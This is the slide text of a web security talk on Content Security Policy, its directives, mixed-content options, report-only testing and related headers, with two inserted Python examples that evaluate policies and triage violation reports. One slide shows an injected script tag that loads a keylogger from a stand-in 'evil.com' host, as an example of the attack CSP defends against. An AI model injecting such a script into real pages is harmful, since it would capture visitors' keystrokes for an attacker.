d3ldn17 - recruiting the browser
Recruiting The Browser
@Scott_Helme | scotthelme.co.uk
Scott Helme
How security has evolved
Browser support
Content Security Policy
Content Injection
<html>
<body>
<comment>
<script src="evil.com/keylogger.js"></script>
</comment>
…
What is CSP?
cache-control: max-age=0, no-cache
content-encoding: gzip
content-security-policy: [policy goes here]
date: Tue, 17 Oct 2017 11:30:00
server: Incapsula
status: 200
CSP Directives
child-src
connect-src
default-src
font-src
frame-src
img-src
media-src
object-src
script-src
style-src
A basic policy
Content-Security-Policy: default-src 'self' example.com
Fine tuning
Content-Security-Policy: default-src 'self';
script-src 'self' cdnjs.cloudflare.com ajax.googleapis.com
<script src="https://ajax.googleapis.com/.../jquery.min.js">
</script>
<script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js">
</script>
Fine tuning
Content-Security-Policy: default-src 'self';
script-src [source list];
style-src [source list];
img-src [source list];
frame-src [source list];
Mixed-Content
block-all-mixed-content
<img src="http://imgur.com/Incapsula-D3.png">
Mixed-Content
upgrade-insecure-requests
<img src="http://imgur.com/Incapsula-D3.png">
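To make the "Fine tuning" and "Mixed-Content" slides concrete, here is a small evaluator that parses a Content-Security-Policy header value and decides whether a given subresource would be allowed. It is an added example for this transcript, not code from the talk or from any browser. It assumes a deliberately reduced subset of CSP: the fetch directives listed above, the 'self' and 'none' keywords, scheme sources such as https:, host sources with an optional *. wildcard, plus the two mixed-content directives; nonces, hashes, 'unsafe-inline', path matching and default-port equivalence are left out on purpose.

```python
from urllib.parse import urlparse


def parse_policy(header):
    """Turn a Content-Security-Policy header value into {directive: [sources]}.

    Directives that take no value (upgrade-insecure-requests,
    block-all-mixed-content) end up with an empty source list.
    """
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def _source_matches(source, target, page):
    """Does one source expression match the parsed target URL on a page at `page`?"""
    s = source.lower()
    if s == "'none'":
        return False
    if s == "'self'":
        return (target.scheme, target.hostname, target.port) == (page.scheme, page.hostname, page.port)
    if s.endswith(":") and "/" not in s:            # scheme source such as "https:"
        return target.scheme == s[:-1]
    if "://" in s:                                  # host source with an explicit scheme
        scheme, host = s.split("://", 1)
        if target.scheme != scheme:
            return False
    else:                                           # bare host source: inherits the page scheme,
        host = s                                    # and an http page may still load https
        if target.scheme != page.scheme and not (page.scheme == "http" and target.scheme == "https"):
            return False
    host = host.split("/", 1)[0].split(":", 1)[0]   # drop any path or port (not modelled here)
    if host.startswith("*."):                       # *.example.com matches subdomains only
        return target.hostname is not None and target.hostname.endswith(host[1:])
    return target.hostname == host


def allows(policy, directive, url, page_url):
    """True if `url` may be loaded under `directive` on a page at `page_url`.

    Mirrors three pieces of browser behaviour from the talk: a missing fetch
    directive falls back to default-src, upgrade-insecure-requests rewrites
    http:// subresources to https:// before matching, and
    block-all-mixed-content refuses http:// loads on an https page outright.
    """
    page = urlparse(page_url)
    if "upgrade-insecure-requests" in policy and url.lower().startswith("http://"):
        url = "https://" + url[len("http://"):]
    target = urlparse(url)
    if "block-all-mixed-content" in policy and page.scheme == "https" and target.scheme == "http":
        return False
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True          # neither the directive nor default-src is set: no restriction
    return any(_source_matches(src, target, page) for src in sources)


def console_message(policy, directive, url, page_url):
    """The kind of line the browser console shows for a refused load, or None if allowed."""
    if allows(policy, directive, url, page_url):
        return None
    kind = directive.split("-")[0]                  # script-src -> "script", img-src -> "img"
    sources = policy.get(directive, policy.get("default-src", []))
    return (f"Refused to load the {kind} '{url}' because it violates the following "
            f"Content Security Policy directive: {directive} {' '.join(sources)}").rstrip()


if __name__ == "__main__":
    # The fine-tuned policy from the slides, evaluated for a page on example.com (constructed).
    fine_tuned = parse_policy("default-src 'self'; "
                              "script-src 'self' cdnjs.cloudflare.com ajax.googleapis.com")
    page = "https://example.com/"
    print(allows(fine_tuned, "script-src",
                 "https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js", page))
    print(console_message(fine_tuned, "script-src",
                          "https://code.jquery.com/jquery.1.11.3min.js", page))
    mixed = parse_policy("default-src https:")
    print(allows(mixed, "img-src", "http://imgur.com/Incapsula-D3.png", page))
    upgraded = parse_policy("default-src https:; upgrade-insecure-requests")
    print(allows(upgraded, "img-src", "http://imgur.com/Incapsula-D3.png", page))
```

The last two calls show the difference between the two mixed-content options: under block-all-mixed-content (or any https:-only policy) the imgur image is simply refused, while under upgrade-insecure-requests the browser fetches it over https instead, which only helps if imgur.com actually serves it there.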
Testing CSP
Content-Security-Policy-Report-Only: [policy]
Console:
Refused to load the script
'https://code.jquery.com/jquery.1.11.3min.js' because it violates the
following Content Security Policy directive: script-src
Testing CSP
Content-Security-Policy-Report-Only: [policy]
report-uri https://report-uri.io
{
"csp-report": {
"document-uri": "http://scotthelme.co.uk/blah/",
"violated-directive": "default-src https:",
"effective-directive": "img-src",
"blocked-uri": "http://imgur.com" ...
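The report-uri slide shows what one violation report looks like; the job of a collection endpoint (report-uri.io in the talk) is to make sense of thousands of them. The triage below is an added example for this transcript, not report-uri.io's code. It assumes reports arrive as the JSON body a browser POSTs to the report-uri, i.e. {"csp-report": {...}} with the fields shown above, and the sample bodies are constructed here, modelled on that report.

```python
import json
from collections import Counter
from urllib.parse import urlparse

# Constructed sample report bodies, shaped like the report on the slide; the
# fourth one is junk, which any public report endpoint will receive.
SAMPLE_REPORTS = [
    json.dumps({"csp-report": {
        "document-uri": "https://scotthelme.co.uk/blah/",
        "violated-directive": "default-src https:",
        "effective-directive": "img-src",
        "blocked-uri": "http://imgur.com"}}),
    json.dumps({"csp-report": {
        "document-uri": "https://scotthelme.co.uk/blah/",
        "violated-directive": "script-src 'self' cdnjs.cloudflare.com",
        "effective-directive": "script-src",
        "blocked-uri": "https://code.jquery.com/jquery.1.11.3min.js"}}),
    json.dumps({"csp-report": {
        "document-uri": "https://scotthelme.co.uk/",
        "violated-directive": "default-src https:",
        "effective-directive": "img-src",
        "blocked-uri": "http://imgur.com"}}),
    '{"not-a-report": true}',
]

REQUIRED = ("document-uri", "violated-directive", "effective-directive", "blocked-uri")


def parse_report(body):
    """Return the csp-report object from a POSTed body, or None if it is malformed."""
    try:
        report = json.loads(body).get("csp-report")
    except (ValueError, AttributeError):        # not JSON, or JSON that is not an object
        return None
    if not isinstance(report, dict) or any(key not in report for key in REQUIRED):
        return None
    return report


def is_mixed_content(report):
    """An https page tried to load an http resource: the case the
    block-all-mixed-content / upgrade-insecure-requests slides are about."""
    doc = urlparse(report["document-uri"])
    blocked = urlparse(report["blocked-uri"])
    return doc.scheme == "https" and blocked.scheme == "http"


def blocked_origin(report):
    """Reduce blocked-uri to an origin so reports for one host group together;
    keyword values such as 'inline' or 'eval' (no host part) are kept as-is."""
    blocked = urlparse(report["blocked-uri"])
    return f"{blocked.scheme}://{blocked.netloc}" if blocked.netloc else report["blocked-uri"]


def triage(bodies):
    """Summarise a batch of report bodies: counts per (directive, origin),
    how many were mixed content, and how many bodies were discarded."""
    by_origin = Counter()
    mixed = dropped = 0
    for body in bodies:
        report = parse_report(body)
        if report is None:
            dropped += 1
            continue
        by_origin[(report["effective-directive"], blocked_origin(report))] += 1
        if is_mixed_content(report):
            mixed += 1
    return {"by_origin": dict(by_origin), "mixed_content": mixed, "dropped": dropped}


if __name__ == "__main__":
    summary = triage(SAMPLE_REPORTS)
    for (directive, origin), count in sorted(summary["by_origin"].items()):
        print(f"{count:3d}  {directive:<12} {origin}")
    print(f"mixed content: {summary['mixed_content']}, dropped: {summary['dropped']}")
```

Grouping by effective-directive and blocked origin is what turns a stream of reports into a short list of decisions ("add ajax.googleapis.com to script-src", "that image host is http-only"), and the mixed-content count tells you up front whether upgrade-insecure-requests alone would silence most of the noise before the policy is moved out of Report-Only mode.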
Other Security Headers
Content-Security-Policy
Content-Security-Policy-Report-Only
X-Webkit-Content-Security-Policy
X-Content-Security-Policy
Public-Key-Pins
Public-Key-Pins-Report-Only
Expect-Staple
Expect-CT
X-Xss-Protection
Secure all the things!
@Scott_Helme | scotthelme.co.uk
Scott Helme